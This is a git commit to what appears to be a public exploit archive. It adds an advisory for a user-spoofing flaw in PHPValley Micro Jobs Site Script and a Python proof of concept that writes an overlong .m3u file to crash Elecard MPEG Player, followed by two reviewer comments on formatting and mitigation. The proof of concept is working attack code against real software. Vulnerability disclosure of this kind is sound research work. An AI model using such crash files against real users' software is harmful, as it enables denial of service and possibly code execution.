From 0d57239a9adcfa57d9cb1ee68d24b7a986b6e3d3 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 21 Oct 2015 05:03:41 +0000
Subject: [PATCH] DB: 2015-10-21 2 new exploits
---
 files.csv | 2 ++
 platforms/php/webapps/38499.html | 17 ++++++++++++++++
 platforms/windows/dos/38498.py | 33 ++++++++++++++++++++++++++++++++
 3 files changed, 52 insertions(+)
 create mode 100755 platforms/php/webapps/38499.html
 create mode 100755 platforms/windows/dos/38498.py
diff --git a/files.csv b/files.csv
index 899d0abc8..63c4e271e 100755
--- a/files.csv
+++ b/files.csv
@@ -34773,3 +34773,5 @@ id,file,description,date,author,platform,type,port
 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
+38498,platforms/windows/dos/38498.py,"Elecard MPEG Player '.m3u' File Buffer Overflow Vulnerability",2013-04-27,metacom,windows,dos,0
+38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing Vulnerability",2013-04-27,"Jason Whelan",php,webapps,0
diff --git a/platforms/php/webapps/38499.html b/platforms/php/webapps/38499.html
new file mode 100755
index 000000000..b18b29a3f
--- /dev/null
+++ b/platforms/php/webapps/38499.html
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/59536/info
+
+PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.
+
+Attackers can exploit this issue to spoof another user; other attacks are also possible.
+
+PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected.
+
+
+
+
+Target Username:
+Your Password:
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/dos/38498.py b/platforms/windows/dos/38498.py
new file mode 100755
index 000000000..55283b2d4
--- /dev/null
+++ b/platforms/windows/dos/38498.py
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/59534/info
+
+Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+# Exploit Title:Elecard MPEG Player 5.8 Local PoC
+# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
+# Product: Vulnerable
+# Elecard MPEG Player,Elecard AVC HD Player
+# RST
+# Date (found): 27.04.2013
+# Date (publish): 27.04.2013
+# Author: metacom
+# version:5.8.121004
+# Category: poc
+# Tested on: windows 7 German
+
+head="#EXTM3U\n"
+head+="#EXTINF:153,Artist - song\n"
+filename= "elecard.m3u"
+
+buffer= "\x41" * 783
+buffer+="\x42" * 4
+buffer+="\x43" * 4
+buffer+="\x44" * 25000
+
+textfile = open(filename , 'w')
+textfile.write(head+buffer)
+textfile.close()
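Review bot: The advisory header in 38499.html never names the affected request or parameter and gives no remediation; "spoof another user; other attacks are also possible" leaves a defender nothing to act on. Judging only from the visible labels `Target Username:` and `Your Password:`, the form appears to submit a caller-chosen account name alongside the caller's own password, which would suggest the server trusts a submitted user name rather than the authenticated session; that is inferred, since the markup itself is not visible in this view. I would add a header line such as `Mitigation: derive the account from the server-side session and ignore any client-supplied user name.` The prose also sits as bare text ahead of the markup, and the file ends without a trailing newline.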
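Review bot: 38498.py is not valid Python as committed, because the advisory text (`source: http://www.securityfocus.com/bid/59534/info` and the three description paragraphs) sits above `#!/usr/bin/python`. The shebang therefore lands on line 9 and has no effect despite mode 100755, and any parser, linter or indexer run over the archive stops at line 1. Prefix those header lines with `# ` and move the shebang to line 1. The header should also state that the script only writes filler bytes (`\x41`–`\x44`) into `elecard.m3u`, so it demonstrates the crash that matches the `dos` category in files.csv, not the code execution the advisory text mentions. As a style point, `with open(filename, 'w') as textfile:` would close the handle even if the write fails, and `buffer` shadows a Python 2 builtin.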